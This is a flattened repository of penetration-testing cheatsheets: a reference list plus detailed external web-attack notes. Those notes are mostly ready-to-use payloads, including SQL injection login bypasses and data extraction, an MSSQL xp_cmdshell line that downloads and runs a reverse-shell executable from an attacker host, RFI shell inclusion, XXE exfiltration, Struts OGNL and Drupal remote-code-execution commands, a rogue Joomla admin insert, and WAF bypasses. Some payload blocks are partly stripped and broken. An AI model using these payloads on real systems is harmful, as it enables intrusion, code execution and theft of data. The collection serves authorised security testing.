├── .gitignore ├── Cheatsheets ├── README.md ├── cheatsheet-references.md ├── external │ ├── 01-web-global.md │ └── 02-web-techno-specific.md ├── internal │ ├── 01-internal-global.md │ ├── 02-wifi.md │ ├── 03-lpe-windows.md │ ├── 04-lpe-linux.md │ ├── 05-post-exploitation-windows.md │ ├── 06-post-exploitation-linux.md │ ├── 07-pivoting.md │ ├── 08-domain-escalation.md │ ├── 09-antivirus-bypass.md │ ├── 10-kerberos.md │ └── 11-wsus.md ├── lab │ └── 01-windows.md ├── mobile │ ├── 01-ios.md │ └── 02-android.md ├── passwords │ ├── brute-force.md │ ├── default-pass.md │ └── hashs.md └── useful-commands │ ├── git.md │ ├── python.md │ ├── screen.md │ ├── shell.md │ ├── unix.md │ └── windows.md ├── README.md └── assets └── images └── logo_dark.png /.gitignore: -------------------------------------------------------------------------------- 1 | assets/** 2 | -------------------------------------------------------------------------------- /Cheatsheets/README.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | ## [Cheatsheet references](cheatsheet-references.md) 4 | ## External (Web) 5 | 6 | * [External Penetration Testing](external/01-web-global.md) 7 | * [Techno Specific](external/02-web-techno-specific.md) 8 | 9 | ## Internal network 10 | 11 | * [Internal Penetration Testing](internal/01-internal-global.md) 12 | * [WIFI](internal/02-wifi.md) 13 | * [Local Privilege Escalation Windows](internal/03-lpe-windows.md) 14 | * [Local Privilege Escalation Linux](internal/04-lpe-linux.md) 15 | * [Post Exploitation Windows](internal/05-post-exploitation-windows.md) 16 | * [Post Exploitation Linux](internal/06-post-exploitation-linux.md) 17 | * [Pivoting](internal/07-pivoting.md) 18 | * [Domain Escalation](internal/08-domain-escalation.md) 19 | * [Antivirus Bypass](internal/09-antivirus-bypass.md) 20 | * [Kerberos](internal/10-kerberos.md) 21 | 22 | ## Passwords 23 | 24 | * [Default pass](passwords/default-pass.md) 25 | * [Brute-force](passwords/brute-force.md) 26 | * [Hashs](passwords/hashs.md) 27 | 28 | ## Useful Commands 29 | 30 | * [Git](useful-commands/git.md) 31 | * [Python](useful-commands/python.md) 32 | * [Screen](useful-commands/screen.md) 33 | * [Shells](useful-commands/shell.md) 34 | * [Unix](useful-commands/unix.md) 35 | * [Windows](useful-commands/windows.md) -------------------------------------------------------------------------------- /Cheatsheets/cheatsheet-references.md: -------------------------------------------------------------------------------- 1 | # Cheatsheet references 2 | 3 | ## Full 4 | 5 | - [https://github.com/swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) 6 | - [https://book.hacktricks.xyz/](https://book.hacktricks.xyz/) 7 | - [https://burmat.gitbook.io/security/](https://burmat.gitbook.io/security/) 8 | - [https://yolospacehacker.com/en/hackersguide.php](https://yolospacehacker.com/en/hackersguide.php) 9 | 10 | 11 | ## AD & Red Team 12 | 13 | - [https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) 14 | - [https://0xsp.com/ad-attack-or-defense/ad-ttps-list](https://0xsp.com/ad-attack-or-defense/ad-ttps-list) 15 | - [https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html](https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html) 16 | - [https://github.com/yeyintminthuhtut/Awesome-Red-Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) 17 | - [https://ired.team/](https://ired.team/) 18 | - [https://github.com/vysecurity/RedTips](https://github.com/vysecurity/RedTips) 19 | - [https://0x00-0x00.github.io/](https://0x00-0x00.github.io/) 20 | - [https://blog.xpnsec.com/](https://blog.xpnsec.com/) 21 | - [https://egre55.github.io](https://egre55.github.io) 22 | - [https://rastamouse.me/](https://rastamouse.me/) 23 | - [https://posts.specterops.io/](https://posts.specterops.io/) 24 | - [https://dirkjanm.io/](https://dirkjanm.io/) 25 | - [https://adsecurity.org/](https://adsecurity.org/) 26 | - [http://www.labofapenetrationtester.com/](http://www.labofapenetrationtester.com/) 27 | 28 | ## Linux 29 | 30 | - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 31 | 32 | ## OSCP 33 | 34 | - [https://casvancooten.com/posts/2020/05/oscp-cheat-sheet-and-command-reference/](https://casvancooten.com/posts/2020/05/oscp-cheat-sheet-and-command-reference/) 35 | - [https://github.com/Ondrik8/OSCP_note](https://github.com/Ondrik8/OSCP_note) 36 | - [https://github.com/0x4D31/awesome-oscp](https://github.com/0x4D31/awesome-oscp) 37 | 38 | ## DFIR 39 | 40 | Digital Forensics and Incident Response 41 | 42 | - [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/#) 43 | 44 | ## Blog 45 | 46 | - [https://dirkjanm.io/](https://dirkjanm.io/) 47 | - [https://beta.hackndo.com/](https://beta.hackndo.com/) 48 | - [https://www.dailysecurity.fr/](https://www.dailysecurity.fr/) 49 | - [https://lsdsecdaemon.com/](https://lsdsecdaemon.com/) 50 | - [https://inf0sec.fr/](https://inf0sec.fr/) -------------------------------------------------------------------------------- /Cheatsheets/external/01-web-global.md: -------------------------------------------------------------------------------- 1 | # External Penetration Testing 2 | 3 | ## **Automated tools** 4 | 5 | ### [httpx](https://github.com/projectdiscovery/httpx) 6 | 7 | Web prober for fast discovery 8 | 9 | ```bash 10 | # Install httpx 11 | go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && httpx -version 12 | 13 | # Usage 14 | httpx -l hosts.txt -silent -title -content-length -status-code 15 | 16 | or it can be pipe with nmap file 17 | 18 | cat *.gnmap | grep http | awk '{ print $2; }' | uniq | httpx -title -content-length -content-type -status-code -tech-detect -sr -srd ./httpx-responses -vhost -websocket -follow-redirects -ports 25,80,81,135,389,443,1080,3000,3306,8080,8443,8888,9090,8089 -retries 2 -timeout 8 -threads 50 -o httpx-redirects.txt --proxy socks5://127.0.0.1:6666 19 | 20 | 21 | ``` 22 | 23 | ### [subfinder](https://github.com/projectdiscovery/subfinder) 24 | 25 | Subfinder is a subdomain discovery tool 26 | 27 | ```bash 28 | # Install subfinder 29 | go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest 30 | 31 | # Usage with httpx and dnsx 32 | subfinder -d -silent | httpx -title -content-length -status-code -silent 33 | subfinder -silent -d | dnsx -silent -rcode noerror,servfail,refused 34 | ``` 35 | 36 | 37 | ### [Nuclei](https://github.com/projectdiscovery/nuclei) 38 | 39 | Full scanner based on templates 40 | 41 | ```bash 42 | # Install Nuclei 43 | GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei; nuclei -version 44 | nuclei -l urls.txt -t 'cves/CVE-2020* -p socks5://127.0.0.1:6666' 45 | ``` 46 | 47 | 48 | ### [dnsx](https://github.com/projectdiscovery/dnsx) 49 | 50 | Fast and multi-purpose DNS toolkit allow to run multiple DNS queries. 51 | 52 | ```bash 53 | # Install dnsx 54 | go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest 55 | 56 | # Usage 57 | dnsx -l hosts.txt -resp -a -aaaa -cname -mx -ns --soa -txt | awk '{ print $2; }' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u | uniq > all-ips.txt 58 | ``` 59 | 60 | 61 | ### [Sn1per](https://github.com/1N3/Sn1per) 62 | 63 | Full scanner including many other tools 64 | 65 | ```bash 66 | # Install Sn1per 67 | docker run -it xerosecurity/sn1per /bin/bash 68 | sniper -t 69 | 70 | # Manual install 71 | git clone https://github.com/1N3/Sn1per && cd Sn1per && bash install.sh && sniper --help 72 | ``` 73 | 74 | ### [Autorecon](https://github.com/Tib3rius/AutoRecon) 75 | 76 | Full scanner 77 | 78 | ```bash 79 | # Install AutoRecon 80 | wget https://raw.githubusercontent.com/Tib3rius/AutoRecon/master/Dockerfile && docker build -t tib3rius/autorecon . 81 | docker run -it -v ~/results:/results --rm --name autorecon-container tib3rius/autorecon --help 82 | 83 | # Manual install pipx 84 | sudo apt update && sudo apt install -y python3 python3-pip python3-venv seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner smbclient smbmap smtp-user-enum snmp sslscan sipvicious tnscmd10g whatweb wkhtmltopdf 85 | python3 -m pip install --user pipx && python3 -m pipx ensurepath 86 | pipx install git+https://github.com/Tib3rius/AutoRecon.git && autorecon --help 87 | 88 | # Manual install python3 89 | git clone https://github.com/Tib3rius/AutoRecon.git && cd AutoRecon && python3 -m pip install -r requirements.txt && cd src/autorecon/ && python3 autorecon.py --help 90 | ``` 91 | 92 | ### [Legion](https://github.com/carlospolop/legion) 93 | 94 | Full scanner 95 | 96 | ```bash 97 | # Manual install (as root) 98 | git clone https://github.com/carlospolop/legion.git /opt/legion && cd /opt/legion/git && ./install.sh && mv /usr/bin/legion /usr/bin/legion2 && ln -s /opt/legion/legion.py /usr/bin/legion && legion 99 | ``` 100 | 101 | ### Kali pre-installed 102 | 103 | ```bash 104 | nikto -C all -output nikto.html -host 105 | ``` 106 | 107 | --- 108 | 109 | ## **Passive discovery** 110 | 111 | dork on domain 112 | 113 | ```bash 114 | inurl:example.com intitle:"index of" 115 | inurl:example.com intitle:"index of /" "*key.pem" 116 | inurl:example.com ext:log 117 | inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv 118 | inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git 119 | 120 | example.com site:pastebin.com 121 | # search for leaks on pastebin, dehashed, raidforums, snusbase, leakedsource, etc. 122 | ``` 123 | 124 | get url in file 125 | 126 | ```bash 127 | cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* 128 | curl http:///file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* 129 | ``` 130 | 131 | get js script 132 | 133 | ```bash 134 | go get github.com/tomnomnom/waybackurls 135 | waybackurls | grep "\.js" | uniq | sort 136 | ``` 137 | 138 | get informations about IPs (alias) 139 | 140 | ```bash 141 | ipinfo='for ip in $(cat hosts.txt); do echo -n \"$ip:\"; curl -s ipinfo.io/$ip | jq ; done' 142 | ``` 143 | 144 | --- 145 | 146 | ## **Active discovery** 147 | 148 | ### Services 149 | 150 | ```bash 151 | nmap -sS -sV -O --top-ports 1000 --script=banner,nse,http-head -oA top_1000 152 | nmap -sT -sV -O -p- -oA full_scan 153 | nmap -sU -sV --top-ports 1000 --open -oA udp_1000 154 | ``` 155 | 156 | --- 157 | 158 | ### Subdomains 159 | 160 | ```bash 161 | amass enum -ip -brute -active -d 162 | 163 | gobuster dns -i -w subdomains.txt -d 164 | 165 | curl -s https://crt.sh/\?q\=%25.\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | uniq 166 | ``` 167 | 168 | check if subdomain exist 169 | 170 | ```bash 171 | cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk 172 | ``` 173 | 174 | subdomain wordlist generator and check if subdomain exist 175 | 176 | ```bash 177 | go install github.com/projectdiscovery/alterx/cmd/alterx@latest 178 | cat targets.txt | alterx -p "{{word}}.{{suffix}}" -pp word=dev| dnsx 179 | 180 | ``` 181 | 182 | --- 183 | 184 | ### Vhosts 185 | 186 | ```bash 187 | nmap --script http-vhosts -p 80,8080,443 188 | 189 | gobuster vhost -u -w common-vhosts.txt 190 | 191 | wfuzz --hh 0 -H 'Host: FUZZ.' -u http:// --hc 400 -w /usr/share/wordlists/wfuzz/general/common.txt -c 192 | 193 | # adding new vhost to /etc/hosts 194 | echo -e "\t" >> /etc/hosts 195 | ``` 196 | 197 | ### Screenshot 198 | Take screenshot of one/many targets 199 | 200 | # Install gowitness 201 | 202 | `go get -u github.com/sensepost/gowitness` 203 | 204 | # Usage 205 | 206 | ``` 207 | gowitness single https://jenaye.fr 208 | gowitness file -p socks5://127.0.0.1:6666 -f ~/.yelaa/rt.txt --screenshot-path ~/.yelaa/rt 209 | gowitness file -f 210 | gowitness nmap -f nmap.xml --open --service-contains http 211 | ./gowitness report serve # to start webview with all screenshots 212 | ``` 213 | 214 | --- 215 | 216 | ### Urls 217 | 218 | ```bash 219 | feroxbuster -u http:/// --proxy socks5://127.0.0.1:5555 -x html,txt,sql,php 220 | 221 | dirsearch -u -e php,html,js,xml -x 500,403 222 | 223 | wfuzz -c -z file,/root/wordlist.txt --hc 404 /FUZZ 224 | wfuzz -c -z file,/root/wordlist.txt --hc 404 --hl 0 /FUZZ 225 | 226 | gobuster dir -u https:// -w ~/wordlists/shortlist.txt -l -v 227 | gobuster fuzz -u https:///?FUZZ=test -w parameter-names.txt 228 | ``` 229 | 230 | URL finder 231 | 232 | ```bash 233 | wget -qO- https://stackoverflow.com/ | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u 234 | ``` 235 | link finder 236 | 237 | ```bash 238 | https://github.com/GerbenJavado/LinkFinder 239 | python linkfinder.py -i https:// -d -o cli 240 | ``` 241 | 242 | Directory listing recustive dump 243 | 244 | ```bash 245 | wget -r --no-parent http:///dir 246 | ``` 247 | 248 | Find asset and params 249 | 250 | ```bash 251 | assetfinder | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done 252 | ``` 253 | 254 | --- 255 | 256 | ### Manual upload 257 | 258 | ```bash 259 | curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http:///newpage 260 | ``` 261 | 262 | --- 263 | 264 | ## **Common attacks** 265 | 266 | ### All Injections 267 | 268 | ```bash 269 | )‘“'"`testocd${7*6}{{7*5}} 270 | ``` 271 | 272 | ### LFI 273 | 274 | Local file inclusion fuzzing 275 | 276 | ```bash 277 | wfuzz -c -w --hw 0 ?page=../../../../../../../FUZZ 278 | ``` 279 | 280 | Getting shell from RFI 281 | 282 | ```bash 283 | ?page=http:///shell.php 284 | ?page=\\\\shell.php 285 | ``` 286 | 287 | **PHP wrapper** 288 | 289 | - PHP Expect 290 | 291 | ```bash 292 | ?page=expect://whoami 293 | ``` 294 | 295 | - PHP data 296 | - 297 | ```bash 298 | ?=data:text/plain, 299 | ``` 300 | 301 | - PHP Input 302 | 303 | Using a proxy like Burp, change the request to a POST request and use the wrapper "php://input", then put your php code into the request body : 304 | 305 | ```php 306 | POST /=php://input 307 | Host: 308 | 309 | 310 | ``` 311 | 312 | **access_log** 313 | 314 | If you find the access log, you can make a GET request with your php code : 315 | ```php 316 | GET /= 317 | Host: 318 | 319 | GET /=/var/log/apache2/access.log 320 | Host: 321 | ``` 322 | 323 | **proc/self/environ** 324 | 325 | Send the payload into User-Agent, and browse the /proc/self/environ file : 326 | 327 | ```bash 328 | GET ?page=../../../proc/self/environ HTTP/1.1 329 | User-Agent: 330 | ``` 331 | 332 | --- 333 | 334 | ### SQLI 335 | 336 | **SQL Injection** 337 | 338 | Bypass authentication 339 | 340 | ```bash 341 | admin' -- 342 | admin' # 343 | admin'/* 344 | admin' or '1'='1 345 | admin' or '1'='1'-- 346 | admin' or '1'='1'# 347 | admin' or '1'='1'/* 348 | admin'or 1=1 or ''=' 349 | admin' or 1=1 350 | admin' or 1=1-- 351 | admin' or 1=1# 352 | admin' or 1=1/* 353 | admin') or ('1'='1 354 | admin') or ('1'='1'-- 355 | admin') or ('1'='1'# 356 | admin') or ('1'='1'/* 357 | admin') or '1'='1 358 | admin') or '1'='1'-- 359 | admin') or '1'='1'# 360 | admin') or '1'='1'/* 361 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 362 | admin" -- 363 | admin" # 364 | admin"/* 365 | admin" or "1"="1 366 | admin" or "1"="1"-- 367 | admin" or "1"="1"# 368 | admin" or "1"="1"/* 369 | admin"or 1=1 or ""=" 370 | admin" or 1=1 371 | admin" or 1=1-- 372 | admin" or 1=1# 373 | admin" or 1=1/* 374 | admin") or ("1"="1 375 | admin") or ("1"="1"-- 376 | admin") or ("1"="1"# 377 | admin") or ("1"="1"/* 378 | admin") or "1"="1 379 | admin") or "1"="1"-- 380 | admin") or "1"="1"# 381 | admin") or "1"="1"/* 382 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 383 | ``` 384 | 385 | Fuzzing parameter 386 | 387 | ```bash 388 | /?q=1 389 | /?q=1' 390 | /?q=1" 391 | /?q=[1] 392 | /?q[]=1 393 | /?q=1` 394 | /?q=1\ 395 | /?q=1/*'*/ 396 | /?q=1/*!1111'*/ 397 | /?q=1'||'asd'||' <== concat string 398 | /?q=1' or '1'='1 399 | /?q=1 or 1=1 400 | /?q='or''=' 401 | ``` 402 | 403 | Oracle Union based 404 | 405 | ```bash 406 | tt' 407 | tt' ORDER BY 4-- 408 | tt' ORDER BY 3-- 409 | tt' UNION SELECT NULL,(select banner from v$version where rownum=1),NULL from DUAL-- 410 | tt' UNION SELECT NULL,(select ora_database_name from dual),NULL from DUAL-- 411 | tt' UNION SELECT NULL,table_name,NULL from all_tables-- 412 | tt' UNION SELECT NULL,column_name,NULL from all_tab_columns where table_name='WEB_ADMINS'-- 413 | tt' UNION SELECT NULL,ADMIN_NAME||PASSWORD,NULL from 'WEB_ADMINS'-- 414 | ``` 415 | 416 | MSSQL Union based 417 | 418 | ```bash 419 | toto' UNION SELECT TABLE_NAME,NULL FROM information_schema.TABLES-- 420 | toto' UNION SELECT column_name,NULL FROM information_schema.COLUMNS-- 421 | toto' UNION SELECT pass,NULL FROM users-- 422 | toto' UNION SELECT name,NULL FROM users-- 423 | toto'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;-- toto';EXEC xp_cmdshell 'certutil -urlcache -f http:///revshell.exe c:\windows\temp\revshell.exe';-- toto';EXEC xp_cmdshell 'c:\windows\temp\revshell.exe';-- 424 | ``` 425 | 426 | MSSQL shell 427 | 428 | ```bash 429 | enable_xp_cmdshell; EXEC xp_cmdshell 'whoami' 430 | EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--;EXEC xp_cmdshell 'whoami' 431 | ``` 432 | 433 | --- 434 | 435 | ### XXE 436 | 437 | XML External Entities 438 | 439 | - [full list of payloads](https://gist.github.com/staaldraad/01415b990939494879b4) 440 | 441 | ```bash 442 | # Vanilla, used to verify outbound xxe or blind xxe 443 | 444 | 446 | :443/test.txt"> 447 | ]> 448 | &sp; 449 | 450 | # OoB extraction 451 | 452 | 454 | :/sp.dtd"> 455 | %sp; 456 | %param3; 457 | %exfil; 458 | ]> 459 | 460 | ## External dtd: ## 461 | :/%data3;'>"> 462 | ``` 463 | 464 | --- 465 | 466 | ### SSRF 467 | 468 | [ssrfuzz](https://github.com/ryandamour/ssrfuzz) 469 | 470 | ```bash 471 | go get -u github.com/ryandamour/ssrfuzz 472 | 473 | echo "http://" | ssrfuzz scan 474 | echo "http:///test.php?u=" | go run main.go scan 475 | cat file_of_domains.txt | ssrfuzz scan 476 | ssrfuzz scan -d file_of_domains.txt 477 | ``` 478 | 479 | --- 480 | 481 | 482 | ### XSS 483 | 484 | Cross-Site Scripting 485 | 486 | ```bash 487 | 488 | 489 | test+()@example.com 490 | test@example().com 491 | ""@example.com 492 | 493 | # CloudFlare bypass 494 | 495 | 496 | 497 | ``` 498 | 499 | 500 | --- 501 | 502 | 503 | ### SSTI 504 | 505 | Server Side Template Injection 506 | 507 | ```bash 508 | {{8*8}} 509 | ${9*9} 510 | #{6*6} 511 | <%= 5 * 5 %> 512 | 513 | "<%= 7 * 7 %>"@example.com 514 | test+(${{7*7}})@example.com 515 | ``` 516 | 517 | --- 518 | 519 | ### ELI 520 | 521 | Expression Language Injection 522 | 523 | ```bash 524 | # J2EEScan detection vector 525 | https://www.example.url/?vulnerableParameter=PRE-${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#parameters.INJPARAM[0]),#kzxs.print(new java.lang.Integer(829+9)),#kzxs.close(),1?#xx:#request.toString}-POST&INJPARAM=HOOK_VAL 526 | 527 | # Blind detection vector 528 | https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#kzxs=@java.lang.Thread@sleep(10000),1?#xx:#request.toString} 529 | 530 | # RFI 531 | https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=new java.io.File(#parameters.INJPARAM[0]),#pppp=new java.io.FileInputStream(#wwww),#qqqq=new java.lang.Long(#wwww.length()),#tttt=new byte[#qqqq.intValue()],#llll=#pppp.read(#tttt),#pppp.close(),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(new java.lang.String(#tttt)),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=/etc/passwd 532 | 533 | # DIR LIST 534 | https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=new java.io.File(#parameters.INJPARAM[0]),#pppp=#wwww.listFiles(),#qqqq=@java.util.Arrays@toString(#pppp),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#qqqq),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=.. 535 | 536 | # RCE LINUX 537 | https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=@java.lang.Runtime@getRuntime(),#ssss=new java.lang.String[3],#ssss[0]="/bin/sh",#ssss[1]="-c",#ssss[2]=#parameters.INJPARAM[0],#wwww.exec(#ssss),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#parameters.INJPARAM[0]),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=touch /tmp/InjectedFile.txt 538 | 539 | # RCE WINDOWS 540 | https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt 541 | ``` 542 | 543 | --- 544 | 545 | ## **Bypass WAF** 546 | 547 | 548 | SSRF localhost 549 | 550 | ```bash 551 | http://127.1/ 552 | http://0000::1:80/ 553 | http://[::]:80/ 554 | http://2130706433/ 555 | http://whitelisted@127.0.0.1 556 | http://0x7f000001/ 557 | http://017700000001 558 | http://0177.00.00.01 559 | ``` 560 | 561 | X-Header 562 | 563 | ```bash 564 | Accept: application/json, text/javascript, */*; q=0.01 565 | Host : localhost 566 | X-Originating-IP: IP 567 | X-Forwarded-For: IP 568 | X-Remote-IP: IP 569 | X-Remote-Addr: IP 570 | X-Client-IP: IP 571 | X-Host: IP 572 | X-Forwared-Host: IP 573 | ``` 574 | 575 | NullByte 576 | 577 | ```bash 578 | file.jpg%00shell.php 579 | shell.php%00file.jpg 580 | shell.php%00.jpg 581 | ``` 582 | 583 | --- 584 | 585 | ## **Burp Extenders** 586 | 587 | Extension|Description 588 | ---|---- 589 | `Retire.js`|[find vulnerable JavaScript libraries](https://github.com/PortSwigger/retire-js) 590 | `Autorize`|[find privileges escalations by replaying admin requests as a simple user](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f) 591 | -------------------------------------------------------------------------------- /Cheatsheets/external/02-web-techno-specific.md: -------------------------------------------------------------------------------- 1 | # Techno Specific 2 | 3 | ## **CMS** 4 | 5 | ### Tools 6 | 7 | ```sh 8 | # cmsmap 9 | git clone https://github.com/Dionach/CMSmap && cd CMSmap && pip3 install . 10 | cmsmap.py -o cmsmap.log 11 | 12 | # wig 13 | git clone https://github.com/jekyc/wig.git && cd wig && python3 setup.py install 14 | Wig.py -w wig.log 15 | 16 | # wpseku 17 | git clone https://github.com/m4ll0k/WPSeku.git && cd WPSeku && pip install -r requirements.txt 18 | python wpseku.py --target 19 | 20 | # droopescan 21 | pip install droopescan 22 | droopescan scan drupal -t 32 -u [-U list_of_urls.txt] 23 | 24 | # joomscan 25 | joomscan -u 26 | ``` 27 | 28 | --- 29 | 30 | ### Wordpress 31 | ```sh 32 | Wpscan (need API key) 33 | WPScan -v --proxy socks5://127.0.0.1:9090 -e u1-100,ap,at,cb,dbe --passwords rockyou.txt --api-token --url 34 | * ap all plugins 35 | * at all themes 36 | * cb config backups 37 | * dbe database export 38 | ``` 39 | 40 | Find version 41 | 42 | * into xml via website.com/rss 43 | * Html source code 44 | * CMSmap or WPScan 45 | 46 | **XMLrpc** 47 | 48 | List methods 49 | 50 | ```sh 51 | POST /xmlrpc.php HTTP/1.1 52 | Host: 53 | Accept-Encoding: gzip, deflate 54 | Accept: */* 55 | Accept-Language: en 56 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 57 | Connection: close 58 | Content-Length: 95 59 | 60 | 61 | system.listMethods 62 | 63 | 64 | ``` 65 | 66 | If there is pingback, try : 67 | 68 | ```bash 69 | 70 | pingback.ping 71 | 72 | http://: 73 | http://:/toto 74 | 75 | 76 | ``` 77 | 78 | --- 79 | 80 | ### Drupal 81 | 82 | - intruder from 0 to 500 on /node/$ 83 | 84 | ```bash 85 | /imce 86 | ``` 87 | 88 | POC1 drupal 8 89 | 90 | ```bash 91 | curl -k -i '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \ 92 | --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a' 93 | ``` 94 | 95 | POC2 drupal 8 96 | 97 | ```bash 98 | curl -k -i '/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \ 99 | --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2' 100 | ``` 101 | 102 | POC3 drupal 7 103 | 104 | ```bash 105 | curl -k -s '/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \ 106 | --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id 107 | ``` 108 | 109 | --- 110 | 111 | ### Joomla 112 | 113 | Joomla 1.5 114 | 115 | ```bash 116 | user:md5_gen(1)MD5$SALT 117 | ``` 118 | 119 | * [https://www.exploit-db.com/exploits/6234](https://www.exploit-db.com/exploits/6234) 120 | * [http://www.passwordtool.hu/joomla-password-hash-generator-salt-key](http://www.passwordtool.hu/joomla-password-hash-generator-salt-key) 121 | 122 | ```bash 123 | creer new users INSERT INTO jos_users (name, username, password, usertype, gid, params) VALUES ('toto', 'toto', 'fcba92f4dd6b902f8a66054b8327ae6b:F2sVBzlFOUl51D3HtRZ0tionaJQGQqB', 'Super Administrator', 25, ''); INSERT INTO jos_core_acl_aro VALUES (NULL, 'users', LAST_INSERT_ID(), 0, 'toto', 0); INSERT INTO jos_core_acl_groups_aro_map VALUES (25, '', LAST_INSERT_ID()); 124 | ``` 125 | 126 | --- 127 | 128 | ## Moodle 129 | 130 | - [https://github.com/inc0d3/moodlescan](https://github.com/inc0d3/moodlescan) 131 | 132 | ```bash 133 | # sudo apt update && sudo apt install python3 python3-pip && cd moodlescan && pip3 install -r requirements.txt 134 | python3 moodlescan.py -k -u 135 | ``` 136 | 137 | --- 138 | 139 | ## **Websocket** 140 | 141 | ### Enumeration using STEWS : 142 | 143 | you can use : https://github.com/PalindromeLabs/STEWS/blob/main/vuln-detect/STEWS-vuln-detect.py 144 | 145 | ### SQl injection : 146 | 147 | - [Python MITM](https://gist.github.com/jenaye/2b0a369ed85de912926fec69c4f07167) 148 | 149 | Run `python3 mitm_websocket.py ws://localhost:8156/ws` and after 150 | your sqlmap : `http://localhost:8081/?id=1" --batch --dbs` 151 | 152 | 153 | --- 154 | 155 | ## **Reactjs** 156 | 157 | - [React Developer Tools](https://addons.mozilla.org/fr/firefox/addon/react-devtools/) (edit props/state/hooks values) 158 | 159 | **Security Testers**: Inject JavaScript and JSON wherever you can and see what happens. 160 | 161 | **Developers**: Don’t ever `useeval()` or `dangerouslySetInnerHTML`. Avoid parsing user-supplied JSON. 162 | 163 | --- 164 | 165 | 166 | ## Webpack configuration (.map) 167 | 168 | use sourcemapper 169 | 170 | `for i in `cat url.txt`; do ./sourcemapper -url $i.map -output output_dir; done` 171 | 172 | 173 | ## **Angularjs** 174 | 175 | Check the bypassSecurityTrustX / innerHTML function 176 | 177 | ```bash 178 | bypassSecurityTrustHtml 179 | bypassSecurityTrustScript 180 | bypassSecurityTrustStyle 181 | bypassSecurityTrustUrl 182 | bypassSecurityTrustResourceUrl 183 | ``` 184 | 185 | --- 186 | 187 | ## **ckfinder** 188 | 189 | ```bash 190 | ckfinder/ckfinder.html 191 | ``` 192 | 193 | --- 194 | 195 | ## **Git** 196 | 197 | - [GitTools Dumper](https://github.com/internetwache/GitTools/tree/master/Dumper) 198 | - [git-dumper](https://github.com/arthaud/git-dumper) 199 | 200 | 